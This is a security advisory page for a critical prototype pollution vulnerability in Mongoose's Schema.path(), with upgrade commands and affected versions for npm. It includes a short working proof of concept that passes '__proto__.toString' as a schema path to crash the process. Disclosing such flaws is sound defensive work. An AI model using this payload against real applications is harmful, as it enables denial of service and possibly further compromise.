VDB
Sign up
CRITICAL9.8

GHSA-h8hf-x3f4-xwgp

Mongoose Vulnerable to Prototype Pollution in Schema Object

Quick fix

GHSA-h8hf-x3f4-xwgp — mongoose: upgrade to the fixed version with the command below.

npm install mongoose@6.4.6

Details

### Description Mongoose is a MongoDB object modeling tool designed to work in an asynchronous environment.

Affected versions of this package are vulnerable to Prototype Pollution. The `Schema.path()` function is vulnerable to prototype pollution when setting the `schema` object. This vulnerability allows modification of the Object prototype and could be manipulated into a Denial of Service (DoS) attack.

### Proof of Concept ```js // poc.js const mongoose = require('mongoose'); const schema = new mongoose.Schema();

malicious_payload = '__proto__.toString'

schema.path(malicious_payload, [String])

x = {} console.log(x.toString()) // crashed (Denial of service (DoS) attack) ```

### Impact This vulnerability can be manipulated to exploit other types of attacks, such as Denial of service (DoS), Remote Code Execution, or Property Injection.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm/mongoose
Introduced in: 6.0.0Fixed in: 6.4.6
Fixnpm install mongoose@6.4.6
npm/mongoose
Introduced in: 0Fixed in: 5.13.15
Fixnpm install mongoose@5.13.15

References